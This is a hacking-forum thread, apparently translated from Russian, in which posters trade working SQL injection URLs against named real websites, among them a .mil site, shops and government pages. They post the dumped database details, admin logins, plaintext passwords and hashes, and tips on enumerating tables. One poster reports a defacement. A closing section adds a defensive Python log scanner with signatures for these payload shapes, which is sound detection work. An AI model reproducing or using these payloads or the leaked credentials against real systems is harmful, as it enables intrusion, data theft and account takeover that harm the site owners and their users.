SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. KEHT33

    It's SQL 5 there....the databases can be read ) there are 125 of them...but the one I think you're looking for is ibf_members
     
  2. K1nD[e]R

    Code:
    http://www.surcon.ru/pages.php?id=13+union+select+1,concat_ws(0x2F,version(),user(),database()),concat_ws(0x2F,login,password,id),4,5+from+users/*
    Data: 4.0.25-standard/[email protected]/vodos68_surcon

    Admin panels

    Login: admin | Password: 1222appex
    Login: seva | Password: 123456
    Login: sdg34 | Password: 123542
     
    1 person likes this.
  3. K1nD[e]R

    Code:
    http://www.shark.ru/page.php?id=-16+union+select+1,2,convert(concat(load_file(0x2f6574632f706173737764)),binary),concat_ws(0x2F,user(),version(),database()),5,6,7,8,9,10+from+mysql.user/*
    Data: root@localhost/4.0.22-standard/sharkid

    root*
     
    1 person likes this.
  4. fRg

    vel-bg.com
    Code:
    http://www.vel-bg.com/catalog.php?cat=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
    5.0.45-community-log:velbgc_chinafood:velbgc_root@localhost

    37 tables:
    Code:
    http://www.vel-bg.com/catalog.php?cat=-1+union+select+table_name+from+information_schema.tables+limit+36,1/*
    4 roots:
    Code:
    http://www.vel-bg.com/catalog.php?cat=-1+union+select+concat_ws(0x3a,USER_NAME,PASS,NAME)+from+users+limit+3,1/*
    USER_NAME:pASS:NAME

    vesi:*8BB36E3127C76C9AD9FBD075975489D08E1C5B44:веси
    svetlio:*4A59E59650A8409075084B2048625BD1BE8711A8:Светльо
    kami:*032197AE5731D4664921A6CCAC7CFCE6A0698693:ками
    sasho:*DEE38E52FC4DD0B60096749662F3F76F2BE8E0AA:сашо
     
    1 person likes this.
  5. KEHT33

    HTML:
    http://gimnazjum4.edu.tubaza.net/comment.php?what=news&id=378+UNION+SELECT+1,2,pass,4,5,6,7,nick,9+FROM+admins+limit+2,1/*
    DB 5.
     
  6. K1nD[e]R

    Code:
    http://www.paintball.ru/next.php?id=999+union+select+1,2,concat_ws(char(58,58),id,pass,username)+from+pb_users+where+id=1/*
    There's a sea of admins, here are the 2 main ones...

    APG - Передовая пароль kr3Bx
    Черная Метка пароль 953z6
     
  7. K1nD[e]R

    Code:
    http://www.mediasoyuz.ru/news/index.php?id=-66+union+select+1,version(),3,concat_ws(user(),char(58),database()),5,6,7,8,9,10,11,12/*
    a5361_media@localhosta5361_media
     
  8. KEHT33

    http://osnews.com/

    HTML:
    http://67.18.254.190/permalink.php?news_id=11384&comment_id=10824+union+select+concat(username,0x2b,password)+FROM+users/*
     
  9. Evgesha23

    _http://www.deti.biz
    Code:
    http://www.deti.biz/product.php?s=1&a00=-1+union+select+concat(version(),0x3a,data base(),0x3a,us er()),2,3/*
    5.0.45-community-log;detibizo_deti;detibizo_deti@localhost
    Code:
    http://www.deti.biz/product.php?s=1&a00=-1+union+select+TABLE_NA ME,2 ,3+from+INFO RMATION_SCHEMA.TABLES+LIMIT+94,1/*
    94 tables
    interesting ones: users, users_roll, sh_user, etc.
     
    #3669 Evgesha23, 12 Nov 2007
    Last edited: 12 Nov 2007
    2 people like this.
  10. 5taY3r

    I don't know what to do with this next... HELP!
    Code:
    http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,concat(0x2b,0x2b,0x2b),7,8,9,10,11,12,13,14/*
     
  11. x.Elf

    I think what confused you was this: "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'"
    But it's all simple:
    http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,concat(0x2b,0x2b,0x2b),aES_DECRYPT(AES_ENCRYPT(version(),0x72),0x72),%208,9,10,11,12,13,14/*
    AES_DECRYPT(AES_ENCRYPT('string','blabla'),'blabla') There are often troubles with the encoding, and to avoid bothering too much you can use this construct.
     
    3 people like this.
  12. Dr.Z3r0

    Check the version:
    Code:
    http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x20),0x20),7,8,9,10,11,12,13,14/*
    Then start guessing the tables
    Code:
    http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM [имя_таблицы]/*
    Replacing [имя_таблицы] with a name that could plausibly be the real name of one of the tables, like user, users, members, etc.; you can find a small dictionary of such names by using the search...

    After that, start going through the columns
    Code:
    http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,[имя_столбца],7,8,9,10,11,12,13,14 FROM [имя_таблицы]/*
    by analogy with the previous example

    And after that you'll ask again...

    P.S. There's actually a dedicated thread for posts like this: http://forum.antichat.ru/thread46016.html
    P.P.S. And when will we learn to read the articles on the topic we're interested in? They weren't written just for their own sake, right?
     
    1 person likes this.
  13. l-l00K

    flaghouse.com
    Code:
    http://www.flaghouse.com/itemdy00.asp?T1=38525'%20or%201=@@version--&iorb=4764
    version: Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
    system_user: ecomlive
    db_name: Ecomlive

    americanmemorabilia.com
    Code:
    http://www.americanmemorabilia.com/Auction_Item.asp?Auction_ID=25746+or+1=@@version--
    version: Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
    user: AmerMem
    db: AmericanMemorabilia

    gamerevolution.com
    Code:
    http://www.gamerevolution.com/manifesto/view.php?id=-193+union+select+1,2,concat_ws(char(58),version(),user(),database()),4,5,6,7,8,9,0,11+--+
    4.1.21-standard-log:[email protected]:gamerev
    Code:
    http://www.gamerevolution.com/manifesto/view.php?id=-193+union+select+1,2,concat_ws(char(58),username,user_password,user_icq,user_email),4,5,6,7,8,9,0,11+from+phpbb_users+limit+12,1+--+
    dUKE:eea342a57c9313484e2b73715a5cbdb1:froggy
    I couldn't get into the admin panel itself; there is additional authorization there
     
    3 people like this.
  14. [53x]Shadow

    mil

    www.esi.mil

    POST injection in the email field:
    Code:
    http://www.esi.mil/forgotPassword.asp
    version:
    Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

    user:esi2005admin
    db:ESI2005

    Databases:
    Code:
    DONCIODashboard
    DONCIOInternetDB
    EmailSurvey
    ESI2005
    
    ESI2005 (tables)
    Code:
    AgreementType
    AgreementTypeLookup
    Audit
    Contacts
    DesignatedCategory
    Final_Price
    ManufacturerLookup
    Questions
    Requirement_Files
    Requirement_Specs
    Requirements_Changes
    Software_Managers
    Software_Products
    Status
    tblProducts
    tblForum
    tblESA
    
    The interesting one, Contacts:
    Code:
    idKey
    sName
    sEmail
    sPassword
    For example:
    [email protected]:ESI8524R
     
    4 people like this.
  15. fRg

    labootika.com
    Code:
    http://www.labootika.com/catalog.php?idproduit=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9/*&cat=1012&PHPSESSID=397829af48e28835dd7cc832800fcad9
    4.0.25-standard-log:labootik:[email protected]

    access to mysql is closed off

    perlasuferintei.ro
    Code:
    http://www.perlasuferintei.ro/catalog.php?mod=detaliiCarte&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12/*
    4.0.27-standard : perla_perlasuferintei : perla@localhost

    maxishop.lv
    Code:
    http://www.maxishop.lv/?p=prece&id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&sad=5
    4.1.16:maxishoputf:maxishoputfuser@localhost

    and again access to mysql is closed off :mad:
     
  16. DJ_Bes

    Basically, http://www.dom3.ru/blog/view/-5867')+union+select+'hfd'/*/0/196/
    + for me )) heh
     
    8 people like this.
  17. fRg

    bazar.glo-con.com
    Code:
    http://bazar.glo-con.com/it/property_directory.php?region_code=46&country_code=-1+union+select+concat_ws(0x3a,version(),database(),user())/*&for_sale=Y
    109 tables:
    Code:
    http://bazar.glo-con.com/it/property_directory.php?region_code=46&country_code=-1+union+select+table_name+from+information_schema.tables+limit+109,1/*&for_sale=Y
    Fields of the admin_logins table:
    Code:
    idlogin
    ida
    logip
    timelog
    hashcode
    Fields of the user_logins table:
    Code:
    idlogin
    customer_code
    logip
    timelog
    hashcode
     
    4 people like this.
  18. b3

    www.royalvideo.ru (camera sales)
    PHP 5.2.4, MySQL 5.0.45-log

    Table users Columns: login, id, pass
    md5(pass) = d9d1b168eac8f197e0576b56cfc23ece
    login:pass = admin:d9d1b168eac8f197e0576b56cfc23ece
    d9d1b168eac8f197e0576b56cfc23ece:gfhjkm = расшифровал на www.milw0rm.com/md5/info.php
    admin panel : http://www.royalvideo.ru/admin/index.php
    there was a deface, but not for long, about 3-4 hours.
    I also read out the DB settings through the admin panel:

     
    1 person likes this.
  19. ЛифчиС5СВ

    Found an SQL injection, pulled out the admin's hash, but couldn't find the admin panel! Only found cpanel =) heh

    SQL-inj:
    Code:
    http://www.pariaman.go.id/berita/index.php?id=-1+union+select+1,version(),3,4,5,now(),7,8,9
    ...

    CPanel:
    Code:
    http://www.pariaman.go.id/cpanel
    Admin hash:password:
    0192023a7bbd73250516f069df18b500:admin123

    Didn't find the admin panel =(
     
    3 people like this.
  20. KEHT33

    HTML:
    http://www.jajca.net/sms.php?id=-1%20union%20select%201,2,3,4,concat(admin,0x2b,pass,0x2b,nick,0x2b,icq),6,7,8,9,10+from+users/*
    HTML:
    http://www.jajca.net/sms.php?id=-1%20union%20select%201,2,3,4,concat(nick,0x2b,pass),6,7,8,9,10+from+admins/*

    HTML:
    http://www.trinitrader.com/product_desc.php?id=121+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+trader_db_admin/*
     
    #3680 KEHT33, 13 Nov 2007
    Last edited: 13 Nov 2007
    1 person likes this.
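
For defenders, the request shapes posted throughout this thread (UNION SELECT with version()/user()/database(), information_schema.tables enumeration, load_file(), the AES_DECRYPT(AES_ENCRYPT()) collation wrapper, a trailing /* or --) are recognisable in web access logs. The following is an added example, not code from any post in the thread: it assumes the Apache/nginx combined log format, and the sample lines, IPs and paths are constructed.

```python
import re
from urllib.parse import unquote_plus

# Signatures modelled on the payload shapes quoted in this thread.
SIGNATURES = {
    "union_select":   re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema_enum":    re.compile(r"\binformation_schema\s*\.\s*tables\b"),
    "fingerprint":    re.compile(r"\b(version|user|database)\s*\(\s*\)|@@version"),
    "file_read":      re.compile(r"\bload_file\s*\("),
    "collation_wrap": re.compile(r"\baes_decrypt\s*\(\s*aes_encrypt\s*\("),
    "comment_tail":   re.compile(r"/\*|--(\s|$)"),
}
# Assumed "combined" log format; only client, request target and status are used.
LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def normalize(target: str) -> str:
    """Decode '+' and %xx until stable (catches double encoding), lowercase, squeeze spaces."""
    prev = None
    while prev != target:
        prev, target = target, unquote_plus(target)
    return re.sub(r"\s+", " ", target.lower()).strip()

def scan_line(line: str):
    """Return None for unparsable or clean lines, otherwise a finding dict."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Path and query are scanned together: some applications take the value from the path.
    text = normalize(m["target"])
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(text))
    if not hits:
        return None
    # One signature alone is weak evidence (ordinary words can match); two or more is an alert.
    return {"ip": m["ip"], "status": int(m["status"]), "hits": hits,
            "severity": "high" if len(hits) >= 2 else "low"}

def scan(lines):
    return [finding for finding in map(scan_line, lines) if finding]

# Constructed sample lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Nov/2007:10:01:02 +0000] "GET /catalog.php?cat=-1+union+select+concat_ws(0x3a,version(),database(),user())/* HTTP/1.1" 200 5120
198.51.100.7 - - [12/Nov/2007:10:01:09 +0000] "GET /catalog.php?cat=-1+union+select+table_name+from+information_schema.tables+limit+36,1/* HTTP/1.1" 200 4890
203.0.113.9 - - [12/Nov/2007:10:02:30 +0000] "GET /item.asp?id=25746%20or%201=@@version-- HTTP/1.1" 500 312
192.0.2.44 - - [12/Nov/2007:10:03:00 +0000] "GET /news/trade-union+select+committee HTTP/1.1" 200 900
192.0.2.44 - - [12/Nov/2007:10:03:05 +0000] "GET /catalog.php?cat=12 HTTP/1.1" 200 7000
""".splitlines()
if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Injection through a POST body, as in the forgotPassword.asp post above, never reaches the request line of an access log; catching it needs application- or WAF-level logging of parameters.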